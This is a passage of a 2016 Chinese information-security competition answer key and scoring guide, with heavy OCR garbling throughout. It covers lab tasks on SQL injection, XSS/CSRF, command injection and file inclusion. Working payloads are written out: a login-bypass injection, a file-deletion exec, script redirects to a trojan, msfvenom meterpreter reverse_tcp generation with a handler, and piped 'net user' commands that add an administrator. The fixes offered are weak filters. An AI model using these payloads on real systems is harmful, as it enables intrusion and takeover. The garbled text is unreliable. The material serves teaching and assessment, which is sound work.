2016信息安全管理與評(píng)價(jià)賽項(xiàng)賽題與評(píng)分標(biāo)準(zhǔn)-第二階段答案及評(píng)分標(biāo)準(zhǔn)_第1頁
2016信息安全管理與評(píng)價(jià)賽項(xiàng)賽題與評(píng)分標(biāo)準(zhǔn)-第二階段答案及評(píng)分標(biāo)準(zhǔn)_第2頁
2016信息安全管理與評(píng)價(jià)賽項(xiàng)賽題與評(píng)分標(biāo)準(zhǔn)-第二階段答案及評(píng)分標(biāo)準(zhǔn)_第3頁
2016信息安全管理與評(píng)價(jià)賽項(xiàng)賽題與評(píng)分標(biāo)準(zhǔn)-第二階段答案及評(píng)分標(biāo)準(zhǔn)_第4頁
2016信息安全管理與評(píng)價(jià)賽項(xiàng)賽題與評(píng)分標(biāo)準(zhǔn)-第二階段答案及評(píng)分標(biāo)準(zhǔn)_第5頁
已閱讀5頁,還剩45頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

任務(wù)1:SQL注入攻防(55分)Web訪問DCST中的WebServ2003服務(wù)器,進(jìn)入login.php頁面,分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)3<tltle-LogLnPagi?</title>67 dhttp-equiv-^ciorite-nL-Typc■**口ocnte-nt /ht■!rclia.T5c-t-ut6</h&ad^9<body>Loq|iii</hl>12I'd''Cujchl wulhodH^pu-ift?r>III:<inputtypr^-,,-1 **emki如次ui■叫■審/X/bi>"5Password:Cinputtype-■■pad■"■name-irpasswd<lu£>uttyfj=t—■'sliJ -n¥<1Life—'"SuJjbJ.t^/>ftLibsptiiLsp?iLtijpUittype—''扎蘭苦n¥<1ue—'"Rt;Het",/>||17inC/bod尸20^2頁面標(biāo)題:<title>LoginPage</title>找到提交的變量名(3分)提供以下變量:name="usernm"name="passwd"對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行SQL注入滲透測(cè)試,使該Web站點(diǎn)可通過任意用戶名登錄,并將測(cè)試過程截圖;(5分)U&ername:artyPassword:any'or100=100構(gòu)造注入語句:username:任意用戶名password:含:orX='X(X為任意值)(3分)同時(shí)包含截圖:1、通過任意用戶名登錄(截圖)(2分)進(jìn)入DCST中的WebServ2003服務(wù)器的C:\AppServ\www目錄,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并將修改后的PHP源程序截圖;(10分)$iisernarne=$GETI*usennm'J;$pauword"$.GET['p^sswd);$conn=ms5qlcomiecU"127aOl'/'MVroof);if(!$conn?{ConnectFailures/brms£ql>elactdb(users'$<onn)orexit(DBSelectFailure</br>'L);S^ql=selectpasswordfromuser&whereus?rname=FSusername"';$res■mssql_query(IsqI,SconnIorexrtf'DBQueryFallure</br>P);if($0bj=mssql_fetch_object(Sres'OCif($cbj->pjssword==^password)!h^dt?f(rIocationsuccess,php);}else{echp"Passwordiswrong';echo"UsernameDoesNotExist";header(,rRgfiresh3;url*:http:/^ —一卄對(duì)|ur?rphp);}(10分)包含語句:1、selectpasswordfromuserswhereusername=$username'2、if($obj->password==$password)再次對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用該注入點(diǎn)對(duì)該DCST中的WebServ2003服務(wù)器進(jìn)行SQL注入滲透測(cè)試無效,并將驗(yàn)證過程截圖;(5分)同時(shí)包含截圖:1、通過任意用戶名登錄(截圖)

(5分)WebB續(xù)訪問DCST中的WebServ2003服務(wù)器,"/"-'"EmployeeInformationQuery",分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)

136財(cái)恥■3<tit /tit<wata.http—iffljiLi.£?=^content-1ypeconten.Mtext/htnl/charsat=utf-H</headt>7D<Jbody>刖口1|1丿密丄吝劃■乜上性丄◎屮油U曽岳LUdblf丄30<forill皿t1CHL叮Qunrytrr]?php" h<wl-,pgfttn>rrsfM'-jnantf1!:<lnputty|^£—"t+*xt?nait—,pi■-sornTu1?<inpiit十ypft—Lmiibmi土-rvh1.i-f—^Smbmitr/>Jinhsp&iiihsp<input十存怖三七rwa)Tue—~RASf*t13</for?C>?U</brXahrot=slie!,htmI'>-CoBack</aX/br'5]</body>1517</htmr-、lr*l找到的源程序含有頁面標(biāo)題:<title>Queryv/title>找到提交的變量名(3分)name="usernm"對(duì)該任務(wù)題目5頁面注入點(diǎn)進(jìn)行滲透測(cè)試,根據(jù)輸入“ %以及“_”的返回結(jié)果確定是注入點(diǎn),并將測(cè)試過程截圖;(5分)PkiixeInputEmpInYecLherraiw*tRMmMV:■sneryueda^ntaail.lyueddBd:.<unT*lflliW?Tin77lufaL]e;LJM?SE?aaPkiixeInputEmpInYecLherraiw*tRMmMV:■sneryueda^ntaail.lyueddBd:.<unT*lflliW?Tin77lufaL]e;LJM?SE?aa□KmEct:]iufceiJkoe:Wo!TeLr:1?aTCT5B3UbLle:L30dSSKfidUuftUlTIl*:%(2分)LlfeZTADE.5"JZi7JaElRn?iiufrimLui]:*ta"tttLMOI麗卄IId&L]e:13?2S3^EB輸入“%,返回所有用戶信息(截圖)ir*rrrW?*_iflJt4iKaK:jWidAL!wbL滄】;ir*rrrW?*_iflJt4iKaK:jWidAL!wbL滄】;SlOEErHITli:.-I.;;:? £????Phb;isvInputFlmplinitSnim: SiJ>M||RiMHJ3E>xkUwirti-atnie:3E>xkUwirti-atnie:H4K;H^iLullll^ei^^tiLkc?ni;加剛?cè)鏾r圾Miikr:l?3^¥^9@irsEnwifRfwviK?>e:r*j>iusi2ndIflWllAflhiUE!;DIC?3TQTF輸入“_”,返回所有用戶信息(截圖)(3分)通過對(duì)該任務(wù)題目5頁面注入點(diǎn)進(jìn)行SQL注入滲透測(cè)試,刪除DCST中的WebServ2003服務(wù)器的 目錄下的1.txt文檔,并將注入代碼及測(cè)試過程截圖;(5分)構(gòu)造注入語句:‘exec‘delc:\1.txt'--(5分)進(jìn)入DCST中的WebServ2003服務(wù)器的C:\AppServ\www目錄,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入滲透測(cè)試,并將修改后的PHP源程序截圖;(10分)截圖:在服務(wù)器場(chǎng)景QueryCtrl.php源程序語句:$keyWord=$_REQUEST[usernm‘]之后加入:$keyWord=add%hsh eyWord);SkeyWordsrtr.replacet^^A^^iktyWord);jkayWord=Str \_V\$knyWord);(10分)再次對(duì)該任務(wù)題目5頁面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用注入點(diǎn)對(duì)該Webserver進(jìn)行SQL注入滲透測(cè)試無效,并將驗(yàn)證過程截圖。(5分)通過:‘exec‘delc:\1.txt'—再次進(jìn)行SQL注入截圖;系統(tǒng)出現(xiàn)錯(cuò)誤提示:BadKeyWord(截圖)(5分)BarnLng:as3q)_oiEry1;)[fimrtlniLiKBqlnm]:negsa^:$1行:'、;Rj址常詰由首忠[severity]E.)In亡業(yè)ffiSkrvbiBVlMEryCltLph^onlineIT■armi刖;加iLxerri“為 pum];Set了filldIn-C-\lwSBi^\?w\fliuitnCirLphpvliiwIT■qMj屬:K5-j]_Etii;hL0fciKt):凰豺巧cdmgt訂mH-a E3JL-jfiultrfiour-:?加仁訕屈口&riImJ?Badlie畑!任務(wù)2:XSS和CSRF攻防(65分)

Web訪問DCST中的WebServ2003服務(wù)器,"/"->"EmployeeMessageBoard",分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)12<titla?10Dsage rd</1111?>http~eqaiv?■'&ont?nt~Type'1wnt*nt=Nt?xt/htinl;charnt=utf-6r7>C/hsAcO<hl>EnplayeeMessjigeBo*rd</hl>BUhiaiM2<inputt^e="tex*M■naiiLd=,'EC5zagcUsername/X/bt>§Ms5sage:</br><textarearia>?s='r,10Trcols=r_5011Jian)e= ssagerx/textareax/br><inputtype?r'sub<Dlfvalue?p'3ufcmltBw/>  <1nputtype?!resef'va1ue">aResetT7></£orjiO13<?phpechoH</brXJihjeef^ .phpp>Diflplay^e£aage</a>q,;-?>含有頁面標(biāo)題:<title>MessageBoard</title>找到提交的變量名:(3分)name二"MessageUsername"name二"message"對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行XSS滲透測(cè)試,并進(jìn)入"/"->"EmployeeMessageBoard"->"DisplayMessage"頁面,根據(jù)該頁面的顯示,確定是注入點(diǎn),并將測(cè)試過程截圖;(5分)構(gòu)造注入代碼:(2分)<script>while(1){alert("Hacker!");};v/script>測(cè)試注入成功:(3分)1hup;IWI” 細(xì)事1<叭.蚯llttvocirfiEn0証■ 「區(qū);蛀饒氏吾-比‘? £|w?ui?1勰門:曙花徵CommunicationMessage彈出alert("Hacker!") 括號(hào)中的消息;對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,使"/"->"EmployeeMessageBoard"->"DisplayMessage"頁面的訪問者執(zhí)行網(wǎng)站()中的木馬程序:,并將注入代碼及測(cè)試過程截圖;(5分)構(gòu)造注入代碼:(2分)<script>location.href二"”;</script>測(cè)試過程:(3分)3JhtIpj//LI84.1.7Ubaif-Bl£KOfla<tItrfflEAatKEplmr?i???O、?iSQ/ ::gG濟(jì)4O事Fl. £.\UrJ.'JEJWJ xl;CoMtnunicalionMessage名稱:trojanhorse.exe發(fā)送者:通過IIS搭建網(wǎng)站(),并通過Kali生成木馬程序TrojanHorse.exe,將該程序復(fù)制到網(wǎng)站()的WW根目錄下,并將搭建該網(wǎng)站結(jié)果截圖;(5分)搭建IIS(1分)InteEiiEt*Er&IESr文件匡】 揺ft 35.VJ茶助> 玄:E仔固罔芒:團(tuán) ■||Vj血卄EtAflH*-凰弟i曲t.+詡孔-OAM-壽KiA阿貼,.鮎熬認(rèn);wn‘iSKiE供詈ji上心1伽WlEjaorw*siInternet信息服務(wù):網(wǎng)站目錄下存放:trojanhorse.exe搭建DNS(1分)正向查找區(qū)域:主機(jī)(截圖)Zone:Org主機(jī):hackerMetasploitFramework:TrojanHorse.exe生成(3分)root@bt:~#lfconfig(截圖)顯示KaliIP地址:root^locilhosttnsfvenom-pv.ir?do*;s.rfeterprater,ravers?_tcplhost-t1O2.16S.1.21Jlpwt=bq-fexe-otrojanhorse,e>tehciplatterrv,asseIected,chocsingnpst::P"odjIe::PllatTorn::bindcih‘sfromhe匚aylo前noArch selectingArch; fromthepaylcaJnomrcoderorbad-zharsspecified<outputtingranpayloadPayloadsize:299byt3Saxtdai;_tcojirihcrie,exe截圖包含:root@bt:~#msfvenom—pwindows/meterpreter/reverse_tcpLHOST二LP0RT=8-fexe—otrojanhorse.exe當(dāng)"/"->"EmployeeMessageBoard"->"DisplayMessage"頁面的訪問者執(zhí)行網(wǎng)站()中的木馬程序TrojanHorse.exe以后,訪問者主機(jī)需要被Kali主機(jī)遠(yuǎn)程控制,打開訪問者主機(jī)的CMD.exe命令行窗口,并將該操作過程截圖;(5分)MetasploitFramework:HackerReverseTcp連接客戶端分)root@bt:~#msfconsolemsf>useexploit/multi/handlermsfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcpPAYLOAD=>windows/meterpreter/reverse_tcpmsfexploit(handler)>setLHOSTLHOST=>msfexploit(handler)>setLPORT80LPORT=>80msfexploit(handler)>exploit[*]Startedreversehandleron[*]Startingthepayloadhandler...(截圖中包含黃色部分)訪問者主機(jī)需要被Kali主機(jī)遠(yuǎn)程控制(3分)KaliMSF提示(截圖)包含如下信息KaliIP:訪問者主機(jī)IP:[*]Sendingstage( bytes)to[*]Meterpretersession1opened(->at meterpreter>nvf#xplsirfhain<nflr)>SKpldr.*Startedraversehandler口n1-92.16S.戈“/丄左:宜!]-1StartirgthipiylQ>Adhirdl?rr,A*1Serdingstage(EaSBKbytes)to192?16B.1.211>]^?erpr?er託沾ion2opened LZ13:?0“ 1^11:1302)肌2016-05^05 詢#0800槌Tfiar電r電r>1Kali截圖包含打開訪問者主機(jī)的CMD.exe命令行窗口;“■"「?ihtllProcess9-SUcrcited?ciiaiinr#l1cr*acedtKieroftwirdosxP 5B1.2oOJ](C)寥訊嚴(yán)盲1945*■■icrosoftCorp?W.IDmvm砒!■ird ystr?叵■進(jìn)入DCST中的WebServ2003服務(wù)器的C:\AppServ\www目錄,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS滲透測(cè)試,并將修改后的PHP源程序截圖;(10分)(10分)在服務(wù)器場(chǎng)景原insert.php程序語句$info=$_REQUEST['message]后加入:綠色部分,通過替換函數(shù),通過其它字符({},(),[]等字符)替換字符“V”和“>”均可得分;$info=str_replace(“V”,”(”,$info);$info=str_replace(“>”,”)”,$info);或$info=str_replace(“V”,”{”,$info);$info=str_replace(“>”,”}”,$info);或$info=str_replace(“V”,”[”,$info);

$info二str_replace( “>”,”]”,$info);再次對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用該注入點(diǎn)對(duì)該DCST中的WebServ2003服務(wù)器進(jìn)行XSS滲透測(cè)試無效,并將驗(yàn)證過程截圖;(5分)Comnunicat1onMcssagcFob!In*Person:IP:I IPuslijuE1inc:DT:昭:礙Fl.口電1便iElEStea|£ECon4ent:(scriptliMiiLc(lHalertPHitkcr!*)(/?cripl)SQLServer企業(yè)管理器中,Message表中info字段注入語句符號(hào)“v”和“〉”被替換為上一題替換后的字符;同時(shí)CommunicationMessage頁面顯示Content:注入語句符號(hào)“<”和“>”被替換為上一題替換后的字符;(5分)Web訪問DCST中的WebServ2003服務(wù)器,"/"->"ShoppingHall",分析該頁面源程序,找到提交的變量名,并截圖; (5分)找到源程序:(2分)I4 I- I-亠3 4 ?亠-辛一??雖-4— 了?亠.性 ? -4— 亠Fpfip-<hj>sbGppuagEaL丄屹FEil>p;*<*tvE-ff=' i]^3>r>o?i£Q ^04dsF=kjayb>paEd££|uant1>'IL?yte?L£^ri&iGfh£iinbQp£riJh>ETpa2fB:10Qk!?t,<*hiiBt=*ShopplngFx^c?sa.php~gc口dF=racLLM£q^■口ti上y=l!Mfcnjs?-&rb5p fanbspjU^£.9-0-DQ</*X/i3r>'r^Kl?Y.hc?r='dhopp1rrq^rw?s9.php'*gwd^=ne>Ei1t?r£>q^ntlt^pl!^ttcnlt4>imbsp4n&sf>£irib9pN4B:5>04.C>(K/?>c/bc?(iij?chg>*<* 15hQpp]kr^PEQc?:*?-php?^wa?-cpikU^*n!tLty*la>crB4hfc<fp£4ib?^?j)bf^wfi.i0Oi^hMf■-S*Affb1i>g^n?iM.ph^g?dMMMF^qUdHil|:£t!y?l、^HMMyCnbfgkMbiipCnbflpUB:500a0K/lX/tiE>*Jnu.f.“Shvfip1nqfrwa?”php?gHd-r"dv4xcMqujJit 1^D-VCRWfinfiip<ri?sp^AppUB注■,0X(ax/1Se>":k£?'X/brX/brX/biX/tirXMsrXahze£?rlist.iitml7>3<iEac^/aX/b^^j1LD頁面標(biāo)題為:<h1>ShoppingHall</h1>找到提交的變量名:(3分)goods二keyboard&quantity=1goods二mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods二memory&quantity=1goods=dvdrom&quantity=1對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,使"/"->"EmployeeMessageBoard"->"DisplayMessage"頁面的訪問者向頁面ShoppingProcess.php提交參數(shù)goods=cpu&quantity=999999,查看"/"->"PurchasedGoods.php頁面,并將注入代碼及測(cè)試過程截圖;(5分)構(gòu)造注入代碼:(2分)<script>document.location二".X/ShoppingProcess.php?goods=cpu&quantity=999999";v/script>WebserverIP:測(cè)試過程:(3分)ShoppingCattGocds;cpu uantitv;39肉狛TYTAL山。価Is999f9^9d?j:-'liuL>」u=-uElk截圖:GoodsCPU數(shù)值大于或等于999999進(jìn)入DCST中的WebServ2003服務(wù)器的C:\AppServ\www目錄,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF滲透測(cè)試,并將修改后的源程序截圖;(10分)17 If(*jCO0Kn<|vUMCmtf1 3- riiue)1IB hr?fa11MlMtMftSMQt<plap? Mesaag?</?x/bE>)19* //echo'"Ccintexit;stsiptags(nif!ot]i]i->iiifowr),,x/br>c/bx></l|QE,>c/tix></,tar></th>ni:2^0Ktas"Content:-^abjr>^fov.^/br>cfbr></b!^</bz>=:/,lbE></'th>";Kho>23 echsr-4 echoy/btX亙href='ttes&a^eBoArd.phpP>bp!lojfisatteflBsajgQBmeAC/aX/bi^1*;截圖:服務(wù)器場(chǎng)景DisplayMessage.php程序語句:echo“Content:”.”$obj->info”.” ”替換為:echo“Content:”.strip_tags(”$obj->info”).” ”(10分)再次對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用該注入點(diǎn)對(duì)該DCST中的WebServ2003服務(wù)器進(jìn)行CSR滲透測(cè)試無效,并將驗(yàn)證過程截圖;(5分)(5分)得分點(diǎn):直接顯示代碼信息,而不是將代碼執(zhí)行;(截圖)SQLServer企業(yè)管理器中,Message表中info字段注入語句含有標(biāo)記<script>v/script>;同時(shí)CommunicationMessage頁面顯示Content:注入語句不含有標(biāo)記<script>v/script>;任務(wù)3:命令注入與文件包含攻防(50分)Web訪問DCST中的WebServ2003服務(wù)器,"/"->"DisplayDirectory",分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)I12:i C:\*■http-ntvnt-Tapw11centA5C;\TsDlrftttory</hl>7<formactior^'Tispla^Oare^toryCtr1.phpJ,methad='hqetr,>C:\'sDirectoxynputtype=Frtej{fiwina=dicecto=yF,fx3<lnput-ype=risLlbni^t"一丁■&二ve=submif'/^&nitiSTiSnhsp<inputtype=,_reset"value=ResetpV>10</htna>12<?php?cho"</br><*href*r1i?t.htnil Eack<?*></br>**j?>頁面標(biāo)題:'sDirectoryv/title>找到提交的變量名:(3分)name二"directory"對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,使頁面DisplayDirectoryCtrl.php 回顯C:\Windows目錄內(nèi)容的同時(shí),對(duì)WebServer添加賬號(hào)“Hacker”,將該賬號(hào)加入管理員組,并將注入代碼及測(cè)試過程截圖;(5分)注入語句:(2分)WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add測(cè)試成功:(3分)截圖:含有:命令成功完成進(jìn)入DCST中的WebServ2003服務(wù)器的C:\AppServ\www目錄,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入滲透測(cè)試,并將修改后的源程序截圖;(10分)/*17 ^dLreetorY1J;ie $sti='|+;if(ft監(jiān)弄tr日止亡?匚上口珂| (IE(!enpty >{yp*ffyatKu^'dir/w ?directory);t3 ectoecho"<ifbrxahirepDieplayDicoctory-php>DispliayC;rs口九Enetai:尸251BissI21 echoyho”:29 /wCiW*);29 *cho yper3Q ?clw 訊弋/自UAEl?ii昭? ?nt?Eth?dlrflctory"</brX<hre£■pDitp1ayDir.ptqp*'>DisplayC:Directory</*X/&r>!,1}卜曰]lLsw|?xltcrlll?a?iinput!");(10分)包含語句:$str='|'if(strstr($directory,$str)==false)再次對(duì)該任務(wù)題目1頁面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用注入點(diǎn)對(duì)該DCS沖的WebServ2003服務(wù)器進(jìn)行命令注入滲透測(cè)試無效,并將驗(yàn)證過程截圖;(5分)截圖1:利用注入點(diǎn)對(duì)該DCST中的WebServ2003服務(wù)器進(jìn)行命令注入滲透測(cè)試;3DisplayC:VsDirectory-licrosuftInicruet文件蹤慢⑥直看辺收藏?工貝⑴幫肋妁?后―?"Q園找素盤晰夾地址;I七切1681202/Displ&yDiir?ctor/phfDisplayC:VsDirectorvCVsDirectory:^HackerPassword/ad(i]Submit]Reset含有本任務(wù)第2題的命令注入語句;WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add截圖2:頁面出現(xiàn)非法輸入提示;含有本任務(wù)題目3修改后代碼中的錯(cuò)誤提示信息;本案例提示信息為:illegalinput!(5分)Web訪問DCST中的WebServ2003服務(wù)器,"/"->"DisplayUploaded'sFileContent",分析該頁面源程序,找到提交的變量名,并截圖;(5分)找到源程序:(2分)1chffanl>14<metahttp-equivsr_content-TipencontentsPrtext/htblL:chaiEet=utf-Sr,/>£</twac!>t-<kiX>Dlgpla^iTpladdedl'bfileContenE</hl>■7 actlor^4rDispliyr11ectxl.php,pMtho^agatpp>{耐ttplo-?d?d4eTil?FullPath(Bq?■七:昭iirpui:typi=^tnKt1fmr^=lf:1 ^x/br>9<InputtypeB^s^ibaLit-**vailueaJSilbitLif/>^nbsp1 typ^-ree&t^valt*fi?-et~it'</£on^<rhtal>12<?php-x/brxa Back^/ax/bo^;*>頁面標(biāo)題:<title>DisplayUpload'sFileContent</title>(3(3分)name二"filename"對(duì)該任務(wù)題目5頁面注入點(diǎn)進(jìn)行滲透測(cè)試,使頁面DisplayFileCtrl.php回顯DCST中的WebServ2003服務(wù)器訪問日志文件:AppServ/Apache2.2/logs/access.log的內(nèi)容,并將注入代碼及測(cè)試過程截圖;(5分)構(gòu)造注入代碼:(2分)..\..\..\AppServ\Apache2.2\logs\access」og回顯DCST中的WebServ2003服務(wù)器訪問日志文件:顯示出AppServ/Apache2.2/logs/access.log的內(nèi)容:(3分)

海二幀耗總?-目溥0征?J海二幀耗總?-目溥ti;t11hilT 1Bfl.1SO2/B1Sfl*ffL1?Cbrl. 程1■.邈F12F畑p“r<Hi西中7^.21£?1噸證Fs:?曬.121-U.U.L--Ut/BWSOL^0j±S7]2T*0,0127.OLO121.0.012T.O.OJ2T-0.012T.0.A121.□.(J131.121-U.U.L--Ut/BWSOL^0j±S7]2T*0,0127.OLO121.0.012T.O.OJ2T-0.012T.0.A121.□.(J131.0.012T.0-O12T.0B0J2T.O.Oin.d.o392.108t--|^W2C>LCe2]e02xO1-[3VW/2O16:^:D3:B1L--|2T.-llai/2£jLei;2]EDd:Ui--俺TMWarn葩凸叮前農(nóng)I-?[2PrFlM/2CL6:E3sO5::5St--(2T/ff3Lr/20lfi:?3:0e:58【一一[2i,rnlaiT/2DLBi23sD7i204DBDI0J*0800]4DSDE]-KJ80IE]4IM0&]■+W0ID]■+B3DEJ*611*GBTHET■SEI*GEIfMT^/LL*SOD^5J沖Ht.MQan?/L1-'£00L£Bunr/b]"2?fe/HTTPXL..「200=52/lojun.rhrHITF/L1"SOO4M^TQIT MITT/L.L"302]"GET/3ucoasf.p?(p^TTP/1.V20014'POST/lQExnAuth.phpEIF/L-l"兀2J弋盯“皿啊述.確血Hl'Jt/1.]*21014■>05T'lotinAiTt^.f-jiRJTP/l.lr3"3■CE1/jworsT.phpHI1E71昇”200l-g■抑FT/ldcinAur?).jhj百5023^GEl/ruECdi.phpH門Ffl*]"FDDklhl別--f2_/Jfei/ZDl5;23sWtK+OBDD][2-/ftr/2QI3J:09:US+CEL.][21/n*i/2Dllj23i(M>52*Ub.j]腫;厳呦曠】1[:ti23illite+OBDV]I?Td^r/ED)l:33:ll>Sr+OBMJ[3Vltu/ZDll:33:lJ:B7-H)BC]C£VHkiZa01li2Qil]i6r+CBDI][2_/Hir/2DIB!23:1L:B8+OEDD]innfat/11:58*OBM)[n/)tar/2DJ11231Him+CBDCI[SVnkj/fDLT;31rl?;ns-rfifir][3^/11^1/2015;23:12:23-HJEE:|[2n/K3r/2DL?J2JtJ4tba+tb.][CT/llti/2Dlli23iMtl?*08QLI[2~/irrr/7DH:71r1S:n3-flR'l][2r/J!ai/2Dl^:2J:15:(J3+OeQLJ[27/)lH-/20U!23il?aH4CBM)[TT/n?/m^:2J:18:IB*OB[)I2V7lai/2DlCi2dt10JLB-06011[2-/Kzr/SDN:21:n:fti-06CO][r’n出諒i::2h:”:m*06.j][曠/1T-T77貝刖2丸HiR-11[2-/fIii/rDI5:2]:n:[JB+OEDO]t£VHar/feD1ll£)l!T:29±4B?]L--|.27,<11^/201?=22:01:2a^00]-[2VW/2tHf:?3:OSs-HjaoolL--[2T/iJtar/30il65.23;Oai36;-HJ80IE]--l2T>flW2tH6S2J:05:2S^80C]I-- [2VN?/2OLe:^i:D^23呻MD&]192L]58「LLR392.]tt8102.1?.L1241BZ.30,192.3A8192.Iffl【昇馭-Lt24-1■亠L(fēng)冏-】9蓋Itt.L.124-■192.158jg匕】骨102.1mis?.]@a192L1礙192-1跆.LLZ4192.1^192.158392.】S8102.18819?.]HHZ108.L.12S-1蛙.16S.ILL自-392.lUkLIN■10養(yǎng)IBS.[.134■]92,]6SP匚|.畫-19?. 168.L1I0三iPUL創(chuàng)-L仁1因-LL124-L1.1託-;L.124-l?l帥--仃1列-L1&3--L124二=ILL制'*GET/HTTF/1.I"200252*GET/Lo^in-phpEHlP/].l"TDD他卡。列/LcEuriAiLlk.EjtipHl:TF/l.i'102J""GET/ffuccess.php“GEJ"GETFT'GET*GE7"GET*GBT*GE7flGET/£U£^C6S£.*GET/mrp/h"GET九MM■恥HTTP/],r2004胡*Pi?3T/LwiMut■九口hpFTT/LI'1023"GET/^Lrcc^n.phpETETP/LL*2DD14^CET71oei]i-j5h?KT7WLL?D0*pasTA^inAutiuptiprrrrr/i.mi"GETZsutces-BiDkgHUF/l.T£00M*CET/UrtT/i.r泗2K"GET竝gs血EflW].1F£DD4起"POST/LrcirtliirKphpHTTF/t.rW23"GET/sLirrcm.phpHTTP/匚LZDD144GET丿HTTP/l.I13002B2/sujcc^iSs賢hp>-su£jce?e,jhp/SUreras,php加UH曲珈zaurce-s's.php丿Eucce^s'i:hp/SUCCeEB.?hxj/sgcrr^F,“hpphpHT7F/1,丁HTTP/Lt*HTTP/l.I*HTTF/l.rRTTP/1P1/HTTP/LL*ffTTP/LrHTTF/l.rHT7P/1,Lr2002E3:00ZDQ20020D^0020n20DJD0刊(12DDInternetExplorer 地址欄中須含有:DisplayFileCtrl.php?filename二進(jìn)入DCST中的WebServ2003服務(wù)器的C:\AppServ\www目錄,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含滲透測(cè)試,并將修改后的源程序截圖;(10分)

Of ■口nuaJ』if(s-trstr(@£11cnajrw$eTe)=fjLls?.l{It(■昨tYWlItnUH))IflCtlG叱章EQ":TOC\o"1-5"\h\zEr??4Xll.?C,./njpl n ;vcho ?ethfii■?"c/btM*hir*C^hDlflfilLl?.^Di dyU|>lMdfrd+?F<Cenlrtnt< *"■elwi Enterrhe?pi口畳打?wruthah亡亡He:4,,</bE-xaBmf"'bxspid'/TiLifi-php"displayUpd址*亡/慮i^llacqeie.ant<.ub)■!?<曰ci上口"Tlle^aluiput■wjsaha^C/bzXAlix?f"DlspliyFlie. ^>£>1splay?plaad?dr:eFileCoat??nt</aX/&!>■*j*?XltJ;(10分)包含語句:$str='..'if(strstr($directory,$str)==false)再次對(duì)該任務(wù)題目5頁面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用注入點(diǎn)對(duì)該DCS沖的WebServ2003服務(wù)器進(jìn)行文件包含滲透測(cè)試無效,并將驗(yàn)證過程截圖。(5分)截圖1:利用注入點(diǎn)對(duì)該DCST中的WebServ2003服務(wù)器進(jìn)行命令注入滲透測(cè)試;輸入框含有本任務(wù)題目6的注入代碼:..\..\..\AppServ\Apache2.2\logs\access.log截圖2:頁面出現(xiàn)非法輸入提示;含有本任務(wù)題目7修改后代碼中的錯(cuò)誤提示信息;本案例提示信息為:illegalinput?。?分)任務(wù)4:數(shù)據(jù)竊取防護(hù):二層攻防(45分)將PC1Kali所連接端口劃入與WA同一VLAN(VLAN10,并將PCIKali分配與DCST服務(wù)器相同網(wǎng)段IP地址,使PC1Kali、DCST中的WebServ2003服務(wù)器能夠在同一個(gè)網(wǎng)段(VLAN10內(nèi)相互Ping通。(2分)截圖:PC1Kali、DCST同在VLAN10(#showvlan)5C5O-2S(fc4)(lorftg-v1nlO)vlManeTyp*MediaPorts1dctaultStaticCMETCtherntTl/Oz5CthernetL/0/6£tnetHCt1/0/7crnernetL/U/fcEthernet1/0陽EtherrctL/O/lQEthcrnctl'011Etticrnetl/Q/12EthernetL^O13EthernetL/0-/14Ethernerl/015Erherritt/O^lGEthernetVO/17Ethernet1/0/18Fthern^t*/0'1AFth(irr*tl/0/7'0etheriiei1/0/21Ethernet1/0/22EthernetL/0_,l!23£rhernet.L/0/24Lthflrn?L/0/25trherretL/o/2ti“hsrnQtl/QGtxh?rr?iL/0/2310VLAW0010staticENETEtherntT1/0.1EtherretpO/;ETherntTl/OZJEtherrQtL/QgMIU56502fl(R-t}(CDrfiavlanLO:■VVLAN1(中包含的接口數(shù)>=3;WebServerIP配置(與參數(shù)表中服務(wù)器場(chǎng)景的IP地址一致):2sSDodiimcinits-<xndGcindnlrtis >ij^GOiirxgfJindoijsIPConFigrupationEcheFnecadapter本地淫接2.:Cnnn?rtdon-cpAtif1cDNSSufFl*.;IFndldrc&A,- :192.1£Q,1.204SubnetMask*-■-* : DefaulcGaeevat/■-* :Ci\Docufncnta?ndSectin^asftdrti.nljtratar>HPC1IP地址配置(與參數(shù)表中PC1的IP地址一致):C-SDocLimenitsandSettings\usei?>ipconfUindousIPConfi^urba1;ionEthernetadapter本地連援:Connection-specITicDNSSuffix”:IPAddress : 192.1G8?1.211SubnetMask. : 2&S,255.25&.0DefaultGAteua^ :PC3IP地址配置(與參數(shù)表中PC3的IP地址一致):

